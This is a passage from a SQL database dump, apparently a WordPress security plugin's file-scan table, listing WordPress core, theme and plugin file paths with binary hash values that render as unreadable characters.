pR)','',0,'?'),('���oo�j�A���N#�','wp-content/themes/maxbusiness/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b:��L�0��\0τW�','J΄�7�R��|��L���[$�ℱ��|Zf�','',0,'?'),('���Ӕ�#�9�D(n�','wp-content/themes/advance/js/headerParallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9X�����ɫ<�4d�','R�^��y�f�C�X������ }.�*Q��','',0,'?'),('���K���\'�\Zxrx��','wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y� ���,�W��\Z�^','Zv�MYWH��k��I=��\Z�Qj�E�ǟ�','',0,'?'),('��Y�\0)\r/j�)�Ar','wp-includes/customize/class-wp-customize-filter-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��`f��\0�iu�','�\0<\n�j:��Y�F���d�w�� ���','',0,'?'),('�SD�=�nK�ظ�','wp-includes/wp-includes/version.php',0,'��|�\ZelǢc�$�\Z','��|�\ZelǢc�$�\Z','H70wN1��_\n�T?a��(-l�]�g��9','',0,'?'),('�P�h`|/���:W�\0','wp-includes/blocks/columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q����-ڠ�t�56�',',C=ē0ȸ�a&�\"WӸ��Ă��0\n�(�73x','',0,'?'),('��DT\'{�_̤ؤP7','wp-content/plugins/wp-cerber/assets/flags/gf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('�$n1��U\\�x(�','wp-includes/blocks/missing/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�YԺ\"9N�Rt�f','k�E�E��+�hR�aw����߸��0{`����','',0,'?'),('�$_���X��la�','wp-includes/js/jquery/ui/sortable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kX���E�EL�&�','F\0|\'��Lk8qp� �(����� v�}/5N![','',0,'?'),('�?��\"no��E�q.u��','wp-content/themes/anima/includes/custom-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X���[�C�͏�{7&','D�:1�@���B�]�4��\0\n���ư~� z','',0,'?'),('�AV��6J㠧u���9','wp-content/themes/fastblog/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\rb��YT�}H�ӊ3A','���*:���@������\n���b[y�','',0,'?'),('�R;lzO�8m<3�Nie','wp-admin/user/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���U�� }��\n�','�οzB�+q���5Vl�K�l��k���Z/��|','',0,'?'),('�_;n�_*�/���Y(`','wp-content/themes/hueman/assets/front/js/lib/vivus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b@$$>J�v���`�H','�ڛ�����@ǵ?�szA�#�̰�.�','',0,'?'),('�afh=F���T�:��6�','wp-admin/includes/class-ftp-sockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\"P����e<��3i','.\Z�D��-����ày!�����̕l��','',0,'?'),('�jp&�\"(8(��2�e','wp-content/themes/vision-lite/images/slide-nav.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q\"k��n�\n�w-�q�*','f]e�8�\'����/�n�N�~jY�unAfY�!^��','',0,'?'),('�{(諸���S:�<X>','wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php',0,',��x&����{\n�x�\\',',��x&����{\n�x�\\','�sޢ���zj�λ�\'Ҳ���wE�?��','',0,'?'),('�����;~ӷR�>��','wp-includes/class.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�zrU[\nK��z��','s�d����� J�WL�+<�I���S4y$)T@','',0,'?'),('���nvp�e������}�','wp-admin/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y\'�@>@������','��o���m�z�Jr;P���%��ːdUS3��>','',0,'?'),('���2s����1�\\w~�','wp-content/themes/promote/inc/kirki/assets/js/branding.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�迾��IBꪼg','�\06z=�a����\\��(���GmTꥪ7SQ','',0,'?'),('��~f���J��,��','wp-content/themes/sg-window/img/icons/small/friendfeed.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�h%8���U��L��','�ɢ�[��P1Ik2����Q���#)� �ډcP','',0,'?'),('��� �JB1�����','wp-includes/wp-includes/js/dist/annotations.js',0,'��T[qx/�^�`P����','��T[qx/�^�`P����','��7��[PS�%�\r����)/Qe�X�|ۺ4�','',0,'?'),('��;�#�:�\'�jѳ�u','wp-content/themes/event/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�LNG�j��I\'\\�_','ʊ����Eg��>�:��M����}�����H','',0,'?'),('��ucZ��o��s�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-comment-spammer-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�p��=r���8ʗ�','�\\��Z���`\\@��*�Ǘ�o3B�&j\0','',0,'?'),('���*��h^������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n<Tfw��Y�_I���','e��\'#�\\�?����O-�U�L�]5�6��$','',0,'?'),('�� �\\���
�Tn��]','wp-includes/Requests/IDNAEncoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��2����P�ر','�M?�~\"��u%�[�,�l����+?F-}�M)�','',0,'?'),('��W�h�DsN� �I5','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',0,'���蛻�0�ե�J9�','���蛻�0�ե�J9�','�V�j݈��o��ȟ{\'7�Úع�����','',0,'?'),('���B\\u}�L�,���','wp-includes/css/dist/block-directory/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?)LH\rb��pi','7h����/���/y��3L��\"�U��n��H\n��','',0,'?'),('���:�[�f��KZ�?�','wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]�N���.���,','r�ŃM\n�.�H���D�3w�m�yb���','',0,'?'),('���(_�J�D~���','wp-content/themes/twentynineteen/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�j%mx�t�h��','��m�ۄ�({�V�3�R�#/.pBց\')r@��','',0,'?'),('�����T���nJ��','wp-content/themes/advance/inc/kirki/assets/js/controls/dashicons.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(c�S��ɹ>��g','畦��A\'!���K��rN�2����u�v.�d','',0,'?'),('���vs<g�bv0�1��','wp-includes/wp-includes/SimplePie/Cache/Redis.php',0,'o.*h�`|,{���mg','o.*h�`|,{���mg','�Yj�q��O�L����1����v��|�b�}|U','',0,'?'),('��\Z���3�H�{�Dz�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r� ���Ϭ�n+�n','^�q�N����Т��&yN�~�\'S//>}�p','',0,'?'),('��8[t�O��(Fs8�','wp-content/themes/newsmag/inc/widgets/posts_column/layouts/posts_column.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I���͵����T��','�;�����T�VP9*kG��q�mqq&�x','',0,'?'),('�Q.�,PY���YN�','wp-content/themes/advance/footer/part-footer1.php',0,'��B?�L�����9�','��B?�L�����9�','��&��Lr���@�U\r����R���2+żq','',0,'?'),('�#:���Sk�U���{�','wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�:�?��l]�����u','2P��탚��=w=��7Ar�\n�fQ��~,��B','',0,'?'),('�(�|n��sARF�+','wp-includes/js/crop/marqueeHoriz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̮����;���Lo\n','|���S�e��|.���/�Q�Y��W�}(','',0,'?'),('�@�<�� ����M�','wp-includes/wp-includes/js/customize-loader.js',0,'�`�6��!��҃z��','�`�6��!��҃z��','�G?~�D�,(�F]�I�bNE��pc�v:���z','',0,'?'),('�IIw`\\nwc���','wp-content/themes/skt-pathway/footer.php',0,'�g�6�Z��o�U��','�g�6�Z��o�U��','�#S%���`�^\n�f��2��80��2��yY','',0,'?'),('�[\'�/���;���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yP58��Ƣ����','��z3qS���T=�䞌HL<Y5A��#H','',0,'?'),('�����:[&b�[�hY��','wp-includes/images/smilies/icon_razz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9[�w���D�AM�A�',';���P�1]f�UE��;`Qڮ�\ne�Z\0@4�aA�','',0,'?'),('����L�7HnWE�DM�','wp-content/plugins/wp-cerber/assets/flags/sj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4� \Z���rM�','',0,'?'),('���x�vOR�cb�x�','wp-includes/wp-includes/images/crystal/code.png',0,'`�1�����1�9','`�1�����1�9',';�67����\r�!����x\Z_@H��&C��-��','',0,'?'),('������T�^�䘪�','wp-includes/wp-includes/js/jquery/ui/draggable.min.js',0,'�J���\\O��Љ/�Hp%','�J���\\O��Љ/�Hp%','�N��B\0�!8\r���o? �)E�C>��','',0,'?'),('���x2�_.�~$�)','wp-includes/js/dist/core-data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��[��z8,g�h(�~�','bl�C�$K�P4��R8��_��a�$�X�','',0,'?'),('����\0MH2,���','wp-content/themes/kidzoo-lite/template-parts/single-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jVG�x\n�!�5Z�G`�','�U�/#\\��2x�}(���]J�Y\"9Օ�P����o','',0,'?'),('�ه�Wz���0���L`','wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',0,'��cW�U��ԟ�`B ','��cW�U��ԟ�`B ','w�\r��j�*�m�l]� �t��PU�\r�E��','',0,'?'),('��l�Rs�r��AѼ?0','wp-content/themes/newsmag/assets/vendors/fontawesome/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�����B�jm�J���','��iym딽��B�`��B��`̕�G����','',0,'?'),('�Ὀ����5f?�hk','wp-includes/widgets/class-wp-widget-media-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�P��/:���#�A','��P����!jz�F#�����d�ĚMP','',0,'?'),('���5zj���n��x�@','wp-includes/wp-includes/js/jquery/ui/progressbar.min.js',0,'\Z�sk�����Z�j Y','\Z�sk�����Z�j Y','���7���v��\r6��1��N9@v�7�$�a��','',0,'?'),('���56$��J���','wp-content/themes/skt-pathway/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��� �y���','���杲E���+�\"�7�����_U���&','',0,'?'),('��{ �����w���H��','wp-content/themes/newsmag/assets/sass/media/_galleries.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�ջKӥ �\ZUՔ�','Fo�8M�\n-3!2�ך�.�:������~j�W�','',0,'?'),('��k5NK�Esu�5]�','wp-includes/wp-includes/css/wp-auth-check.min.css',0,'�j��b�u��=�`c','�j��b�u��=�`c','�\r[�B�{\'C�N5zZw� pȈ��I�K�e ��','',0,'?'),('����8`9��?Bb�Б','wp-includes/js/jquery/ui/effect-puff.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��5�����t�','`}��`�J)�$;��+�6K�C1R�&]C�i��','',0,'?'),('����F)��cPO�R�?','wp-content/themes/sg-window/img/icons/blogger.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M4�m�W�G�#��','~ ���o�W��������c�L�[5�R)f>�','',0,'?'),('���4��vT�?O��','wp-includes/wp-includes/class-wp-date-query.php',0,'3�U�� �L]-�Rs�@�','3�U�� �L]-�Rs�@�','ֲP4]���! o3\n��l���Q�0�','',0,'?'),('�\n��� ��/Y','wp-includes/js/dist/data-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�k/�Z���D)','��1`C�w���8�<�w1�ko����\\/��%s�','',0,'?'),('�J���\Z��m=�','wp-content/themes/sg-window/inc/widget-items-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yZr�,��F郀���',' @�g�*�[4�o��!_�~����\ZH����R','',0,'?'),('�4��+��&S�`J','wp-includes/wp-includes/feed.php',0,'�z2�j��(=iSM�IV�','�z2�j��(=iSM�IV�','\Z�/������\'\\��.�� 7�����3','',0,'?'),('�C8���t+���)I','wp-includes/wp-includes/blocks/heading/block.json',0,'M�J��+��4G��Ѹ','M�J��+��4G��Ѹ','+\\�X��IJ��J����\'�|��KiV��TD����u','',0,'?'),('�D��?ļ�\n����','wp-content/plugins/wp-cerber/assets/flags/ml.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��hϸ-�1�՞��3','�A\0�]�ҕ#�:\r40�2��W�A%��)V\n','',0,'?'),('�a��.�j@��^��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<Qq��)@�M��J��','/�jo�z�y����@��z%9�&F%��[','',0,'?'),('�c�̎��$\n\'@�\r��','wp-admin/setup-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�~yEfF��d�x��','O�tJʰ�Z伡��V�S<ͤw�z1W�~>��0)','',0,'?'),('�g�h�B�g��lI�~','wp-includes/wp-includes/js/dist/vendor/react-dom.js',0,'C��InV��9����','C��InV��9����','LrJ�#��6h����\r�ȴD�R5��b:uM','',0,'?'),('�m֙7�,�}��ov','wp-includes/css/dist/block-library/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ԝ����p1l�','\ns�:���$�}K���%\rr�hM��Ap\r��','',0,'?'),('��8��צ������z\'','wp-content/themes/anima/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P#�����w4,W','��LU��<L[����G\r��Wh�s�X�x�S�8','',0,'?'),('���6x����O�����e','wp-content/themes/sg-window/inc/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�p�:.������B\r','�o�mBa��S�\n�{}$g-� Gfh���','',0,'?'),('���V��t�S�-��','wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z>?�iY+Q�K�C��','r������쐋����&5�Q8�C\"���K�','',0,'?'),('���H\03�ۡ�E�p�$$','wp-content/themes/twentytwenty/template-parts/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�)�\Z~w�������','�%���K.�P��V�vZ�ښ�[\0�ȗfE��6','',0,'?'),('���J1��M�F��<�','wp-admin/js/tags-box.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' P�f�R2���.��z','��/��\n���0ۥK���.�Į�\r&$B�\Z}','',0,'?'),('�����Ƅ���NB','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@8���s��A��','b�#�x��h�F4�_ �De���qeD��','',0,'?'),('���^>���6z�@p�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',0,'�C_�n�4]hc��3�?','�C_�n�4]hc��3�?','�wD�Z��s�J������dӚ�K���N҇','',0,'?'),('��������ʘ}�\0','wp-content/themes/promote/inc/kirki/assets/scss/controls/dimension.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������?�@�X�u','�W16N\Z��y�$���0��lW-����m','',0,'?'),('���?ڟ�E���$PF','wp-includes/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('��\\���5��� �\0p','wp-content/themes/event/page-templates/gallery-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aȭ�\0�\nBaا_{4�','k�0�\"��s:�Ф��u9�V����Rݞ%��','',0,'?'),('���6��b�g�>_�','wp-includes/images/wlw/wp-watermark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),('���Z�C?��Ԟ��','wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php',0,'9�5��e�f��#�ϝ','9�5��e�f��#�ϝ','��i��\rC��\"Գ�\r4��8�c��S��','',0,'?'),('��F�_#Y ���$Ra','wp-content/themes/pine/template-parts/content-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0\\���%��s*�','�ϖt�,&w��N�~Cys8��m�鮳�IN�','',0,'?'),('�h�x�*(�&���kO�','wp-content/plugins/wordfence/views/blocking/country-block-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��yGF�,{��X�z','%Ԝ5��;�����x��^)���G(��o','',0,'?'),('�����\'K�z�f��','wp-includes/customize/class-wp-customize-header-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�$+��q?��U��','�9@mr�ܵ��\"+B���V�K.�uB\"�����','',0,'?'),('��5#�\"8�%`}','wp-content/wflogs/template.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('�\r�f����h�8�!','wp-includes/Requests/Exception/HTTP/500.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����km�\n H�M��','FO���V3\"���������!k�P�','',0,'?'),('���v9�b�$�L','wp-includes/random_compat/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X:,��t]7�=��Q��E','��,��t�\0_g�X%4.�tP�]�>�JT4','',0,'?'),('���C�s�ZoBx�F�','wp-content/themes/sg-window/img/empty.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��u�,`d�G��','\\˫[�� x7��U˳���W4��_}���1��','',0,'?'),('�!Y;��I-���u','wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�rV��S�|�k���',' ��^��67�+�k�`�ۍ���]B���G��p','',0,'?'),('�#�?���Gc ¯l1e','wp-includes/class-wp-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ɱ��h�k2\\���','��8B�^���K��ڝo�d#T��s\0����C','',0,'?'),('�+Z�黶:�qO9]�W','wp-content/themes/weblog/acmethemes/customizer/header-options/menu-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����V�)�\rE@�','Bv? �O/&0���b$�U��r����%�4\"','',0,'?'),('�3���I��dpp�<��','wp-content/themes/advance/inc/kirki/assets/scss/controls/typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�Gz��Fi�6��c','.��zF2�V�^W�,#g�!t���t���g8�','',0,'?'),('�EW]Vݐ�Ձ�6�]�\0','wp-includes/wp-includes/class-wp-simplepie-sanitize-kses.php',0,'\0s�7�^�GU���_','\0s�7�^�GU���_','�EJ�\'{6�i���|�~�c��/�l','',0,'?'),('�H�����Pw��%8��','wp-includes/images/smilies/icon_sad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('�K�{�*�)�����','wp-content/plugins/all-in-one-wp-security-and-firewall/js/wp-security-admin-script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�@�c��<�W8DM','��wL�\rd�Ê��3��<\'\n�:&̉��$3$O','',0,'?'),('�M�/6�ƫ�9J�Fg�','wp-content/themes/spidermag/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3���z�w�r��f0s','��(��J�b����\r�]~�]%��G#��9�8','',0,'?'),('�Q49��Lz�J�','wp-content/plugins/wordfence/lib/wfUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','()p��|˜���s���T','���R��j�-y}��EHh\r�F�D�����BA�','',0,'?'),('�V��{v#���V�mE','wp-content/themes/advance/inc/kirki/assets/js/controls/checkbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ă���O*��B�&X�T','_��\'`���tQ?_��`N�\0C���p�X��','',0,'?'),('�XX*��!2�~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eb:lx-�<��s99`','�,��{ m��Z��BV�TL�;*���<','',0,'?'),('�ZJ�V!���ّ��','wp-content/themes/Endolf/inc/breadcrumbs.php',0,'\'W�w�S��䇺���j�','\'W�w�S��䇺���j�','nB�X-TZq�˝����J-J��]�#��4A�<q','',0,'?'),('�[�n�G{�\'��q:�','wp-includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K��Mý','��{�\"�z�GW1ɓDĝ��U�͏�[���','',0,'?'),('�\\�h� R�X�<�C�','wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���߅�w@L��O�R','��EF�j���r�č;s��.f:��Ϥ�F','',0,'?'),('�k��UID����s{','wp-content/themes/capacious/inc/metabox/metabox-defaults.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(�,2x}׃�=k%��','�&<�O�cƁ<���W�\\�fis������6G���','',0,'?'),('�|W��<�|ƀJ��','wp-content/plugins/wp-cerber/assets/flags/cw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��)m��u�� ��H','wp-content/themes/cactus/template-parts/footer/site-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�mc�!A','*<H�8Tl�OP�#���N��Y�cC�@��$�}','',0,'?'),('��Y7����yZn��\0','wp-includes/wp-includes/js/jquery/ui/menu.min.js',0,'e��\"f_�2�eg�','e��\"f_�2�eg�','�{�B��x��\r;f �2��4�/����4E�','',0,'?'),('��eN#x�ܕ���{','wp-includes/wp-includes/class-wp-http-requests-hooks.php',0,'�,ͣa4h��D�U�+','�,ͣa4h��D�U�+','�5���կzV��Rt�I/�+˘H0N����\'C','',0,'?'),('��J�ח�_yzx�6O','wp-admin/network/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��>�H\r��5:�6�','*]X8���%�KқR ���Q�f�;\ne�\r�6\\','',0,'?'),('��_´T�������','wp-includes/wp-includes/rest-api.php',0,'W�ם�Z�1I$\'O�','W�ם�Z�1I$\'O�','�|\r�j���͞�;#�\nZ�0�|�Iݩ���','',0,'?'),('���Ȁ�~_q�I��S�','wp-admin/js/password-strength-meter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z��3�r�;]�<|�','����1��y吥!�}}�3ɻ}}�te\nt�','',0,'?'),('���\\�D �>�F,���','wp-admin/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�����\r�]@��','�M�!҃�hMg?LO�\0ş�@���M�\"M�.','',0,'?'),('��zc|��ـ�vM','wp-includes/wp-includes/css/dist/block-library/style.min.css',0,'����{`�q���\'2P','����{`�q���\'2P','Wf�y�����7hc��ajkgd�4��8�ɢ��','',0,'?'),('��x�z��z��jMH��','wp-includes/wp-includes/class-wp-http-response.php',0,'��4��y�K���ߕ','��4��y�K���ߕ','�Ι ��[�{\0If�\0�t��v\n9d����x��','',0,'?'),('��$ \'�6�y�T}3�','wp-includes/wp-includes/js/mediaelement/renderers/vimeo.min.js',0,'�C9���Y�O���','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('��>>D�ς���wOwi','wp-content/themes/Endolf/homepage.php',0,'u6LIqk �&K�\rܐb','u6LIqk �&K�\rܐb','1�w�F�j�J��+���G�}���/�f�f|�','',0,'?'),('�� �\")�\"��0I�o��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��q\Zs��q776�','C�D�a�$�=�f[Q�4�JW�7l)�.�=%��','',0,'?'),('�������&Ż�(','wp-admin/js/widgets/custom-html-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��˧0�o�r�j�{�','<������\"W63�`�/p�0h���LH�MG1','',0,'?'),('��~+�q�X��\"`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oaQ���|g�4&��','�c�U�X����+�]Wvd�=�,����Z0)\\�','',0,'?'),('�]~���K*Ղ㈔','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js',0,'��lS?,�ra�4;�^F','��lS?,�ra�4;�^F','�D�;�䏑��eH�i�b�\Z�?�b����','',0,'?'),('�g��!\\U�o��b','wp-content/themes/hueman/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������*�u�','�g)�F��Rv�!0�7��0���A���2��#','',0,'?'),('�!-�.\'�T@�Ѭ8|�u','wp-content/themes/pine/admin/img/none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ro�o=}�\' �ͽ','���n~�ŕh�Կ��&�Qp674sN_l�','',0,'?'),('�*�`)r��^&M�','wp-content/themes/pine/admin/css/pine-admin-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����@�(�:}(�S�Z','��a���������jAY�� R���$�-Dv�','',0,'?'),('�6���[\ZM����','wp-includes/wp-includes/Requests/Exception/HTTP/400.php',0,'Q�n���VJ�R�x�5��','Q�n���VJ�R�x�5��','�d�>���� �i�H����b$�&�n���6�p\Z','',0,'?'),('�Bo=�VG���?Jhl','wp-content/themes/spidermag/spidermag/customwidget/widget-secondblock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]}�3�VE��ku','�͗-݉��uYFZ:\n8X�ۜ��1!^�Gw:���','',0,'?'),('�L|�S@g��c�Jk�C�','wp-content/themes/hueman/assets/front/img/ie/opacity-80-light.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�O�^�\Z����G����','�dd�U�m�\\.\'�9\Z-�1s�\\Gbr�],aj�3','',0,'?'),('�O��Ů�t&�ܠ�bJ','wp-includes/wp-includes/blocks/preformatted/block.json',0,'Lr\r,�Av`�� ���T','Lr\r,�Av`�� ���T','6�.�_��*��NMo�\r��k��n�Z�\r/��+','',0,'?'),('�T�r6�0d#�B�C','wp-content/themes/skt-pathway/css/mobile.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���O��p�I@��q','�j�&mE���d�tZO[��=�Bh8��FS��|','',0,'?'),('�|Y�!�9��c!YQ','wp-includes/wp-includes/media-template.php',0,'��]p�uA@j4� k','��]p�uA@j4� k','|p��!NR�o�*mc�>�8��t���f5-\Z;m6','',0,'?'),('���9�d���إ��','wp-content/themes/capacious/inc/customizer/js/admin-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�e��e�!{J6�U�b','kS�����^Yp�����^��X�������E�7','',0,'?'),('��}Hy�M��1�ě8','wp-admin/images/about-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nڢ�U�����M�','��@^��Iͮ�s������L�:}|9�ƶ�KXk','',0,'?'),('��=CѠ��*TX�4','wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ր�]P�̍f��Vk�k�','�3}�c9j�my�����@s��p�VR�9Z','',0,'?'),('����;X�3�j����','wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php',0,'XP�sHG�/n�w','XP�sHG�/n�w','�-ܙ���_�P^�C����`ֵ�.���F�If','',0,'?'),('��ڷt�g�Z�gE�','wp-includes/class-wp-http-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��y�K���ߕ','�Ι ��[�{\0If�\0�t��v\n9d����x��','',0,'?'),('��K5E�,\\��l�','wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',0,'=���B�9�$v\r ','=���B�9�$v\r ','�X�-��y���H��VKr�V��Y˴t���X��','',0,'?'),('��@`�s� 